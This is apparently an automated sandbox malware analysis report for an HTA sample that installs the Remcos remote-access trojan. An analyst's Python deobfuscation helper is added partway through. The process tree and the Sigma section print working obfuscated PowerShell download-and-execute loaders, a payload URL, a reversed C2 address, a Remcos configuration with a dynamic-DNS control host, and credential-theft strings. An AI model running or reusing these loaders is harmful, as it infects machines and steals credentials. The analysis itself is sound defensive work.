
Windows Analysis Report
na.hta

Overview

General Information

Sample name: na.hta
Analysis ID: 1533059
MD5: 52bb72daa6c16c09d4298bd59e12b7d9
SHA1: 2e4aef7df584acaadb5a6e555d6e2f40ae12b6f1
SHA256: 8fbf6165b0751a47bf9842011e82c4a7715cc879fd7272b45ab549df6e813e46
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 3788 cmdline: mshta.exe "C:\Users\user\Desktop\na.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3812 cmdline: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 5016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 3840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • RegAsm.exe (PID: 3092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 4072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 6500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 5352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 5704 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
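Read bottom-up, the tree above is a four-stage loader. mshta.exe runs the HTA, which starts a PowerShell whose base64 argument (reproduced in full in the Sigma matches further down) is an Add-Type P/Invoke wrapper around urlmon URLDownloadToFile that fetches the .vbS into %APPDATA% and starts it. wscript.exe then runs that script, which spawns PowerShell with a second base64 blob; the third stage it decodes (PID 4720) downloads a "jpg" from raw.githubusercontent.com, carves the text between <<BASE64_START>> and <<BASE64_END>>, reflectively loads the decoded assembly and calls dnlib.IO.Home.VAI with a reversed C2 URL and "RegAsm" as the host-process name, which is why the Remcos payload ends up inside RegAsm.exe (PID 3092). The Python below is an added analyst helper, not part of the Joe Sandbox report: it undoes the third stage's `tg4`→`$` and `NlL`→`'` substitutions and string concatenation, restores the reversed arguments, resolves the `(gV '*MdR*').Name[3,11,2]` alias, and reproduces the marker carving with the bounds check the malware itself never enforces. The obfuscated command is copied verbatim from PID 4720 above; MaximumDriveCount is the default PowerShell variable that the `*MdR*` wildcard resolves to, and the payload blob used to exercise the carver is a constructed stand-in, not the real DetahNote_V.jpg.

```python
from __future__ import annotations

import base64
import re

# Third-stage PowerShell command line of PID 4720, copied from the process tree
# (unchanged apart from being split across Python string literals).
OBFUSCATED = (
    "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'"
    "+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'"
    "+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);"
    "tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = "
    "tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 "
    "-and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - "
    "tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = "
    "[System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]"
    "::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke("
    "tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, "
    "NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36)"
    ".REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
)

START, END = "<<BASE64_START>>", "<<BASE64_END>>"


def deobfuscate(cmd: str) -> str:
    """Undo the stage-3 transforms and return one PowerShell statement per line."""
    joined = cmd.replace("'+'", "")             # PowerShell 'a'+'b' literal concatenation
    end = joined.lower().find("').replace(")    # quoted script ends where .Replace() begins
    if not joined.startswith("('") or end < 0:
        raise ValueError("not the expected ('...').Replace() wrapper")
    inner = joined[2:end]
    inner = inner.replace("tg4", "$")           # .Replace('tg4', [char]36)  -> '$'
    inner = inner.replace("NlL", "'")           # .Replace('NlL', [char]39)  -> "'"
    return "\n".join(stmt.strip() for stmt in inner.split(";") if stmt.strip())


def unreverse(value: str) -> str:
    """Reverse a string if, reversed, it reads as a URL (the stage stores its C2 backwards)."""
    flipped = value[::-1]
    return flipped if flipped.lower().startswith(("http://", "https://")) else value


def invoke_args(script: str) -> list[str]:
    """Arguments handed to dnlib.IO.Home.VAI, with reversed URLs restored."""
    m = re.search(r"\.Invoke\(\$null, @\((.*?)\)\)", script, re.S)
    if not m:
        return []
    return [unreverse(a) for a in re.findall(r"'([^']*)'", m.group(1))]


def extract_urls(script: str) -> list[str]:
    """Every quoted string that is a URL, forwards or reversed, in order of appearance."""
    urls = []
    for s in re.findall(r"'([^']*)'", script):
        s = unreverse(s.strip())
        if s.lower().startswith(("http://", "https://")):
            urls.append(s)
    return urls


def alias_from_variable(name: str, indexes: tuple[int, ...]) -> str:
    """Resolve the (gV '*MdR*').Name[3,11,2] -join '' trick: pick characters by index."""
    return "".join(name[i] for i in indexes)


def carve_payload(blob: bytes) -> bytes | None:
    """Stage-3 marker carving, returning None (instead of throwing) when markers or base64 are bad."""
    text = blob.decode("utf-8", errors="ignore")
    start = text.find(START)
    if start < 0:
        return None
    end = text.find(END, start + len(START))
    if end < 0:
        return None
    try:
        return base64.b64decode(text[start + len(START):end], validate=True)
    except ValueError:
        return None


# Constructed stand-in for the downloaded "image": JPEG-looking bytes around a base64
# DOS header (18 bytes beginning with "MZ"). An assumption, not the real file.
SAMPLE_BLOB = (b"\xff\xd8\xff\xe0 junk " + START.encode()
               + b"TVqQAAMAAAAEAAAA//8AALgA" + END.encode() + b" trailer")

if __name__ == "__main__":
    script = deobfuscate(OBFUSCATED)
    print(script)
    print("URLs:", extract_urls(script))
    print("VAI args:", invoke_args(script))
    print("alias:", alias_from_variable("MaximumDriveCount", (3, 11, 2)))
    print("carved:", carve_payload(SAMPLE_BLOB))
```

Two things in the decoded output are worth noting. The line `$startIndex -ge 0 -and $endIndex -gt $startIndex` is a bare expression whose result is discarded, so the original stage simply throws if the markers are missing; `carve_payload` returns None instead. And the fifth VAI argument, `RegAsm`, is the host-process name, which is exactly the RegAsm.exe that appears under PID 4720 in the tree and that the Yara hits on `11.2.RegAsm.exe.400000.0.raw.unpack` identify as Remcos.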
Malware family reference

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware configuration (Remcos)

{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara Overview

Dropped files:
  • Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Memory dumps:
  • Source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  • Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
  • Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  • Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
  • Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
    Strings:
    • 0x6c4b8:$a1: Remcos restarted by watchdog!
    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
  (26 entries in this table; only those above are reproduced)
Unpacked PEs:
  • Source: 11.2.RegAsm.exe.400000.0.raw.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
  • Source: 11.2.RegAsm.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  • Source: 11.2.RegAsm.exe.400000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
  • Source: 11.2.RegAsm.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
    Strings:
    • 0x6c4b8:$a1: Remcos restarted by watchdog!
    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
  • Source: 11.2.RegAsm.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
    Strings:
    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6657c:$str_b2: Executing file:
    • 0x675fc:$str_b3: GetDirectListeningPort
    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x67128:$str_b7: \update.vbs
    • 0x665a4:$str_b9: Downloaded file:
    • 0x66590:$str_b10: Downloading file:
    • 0x66634:$str_b12: Failed to upload file:
    • 0x675c4:$str_b13: StartForward
    • 0x675e4:$str_b14: StopForward
    • 0x67080:$str_b15: fso.DeleteFile "
    • 0x67014:$str_b16: On Error Resume Next
    • 0x670b0:$str_b17: fso.DeleteFolder "
    • 0x66624:$str_b18: Uploaded file:
    • 0x665e4:$str_b19: Unable to delete:
    • 0x67048:$str_b20: while fso.FileExists("
    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
  (18 entries in this table; only those above are reproduced)
AMSI:
  • Source: amsi32_3812.amsi.csv | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security
  • Source: amsi32_4720.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

Sigma Overview

System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, 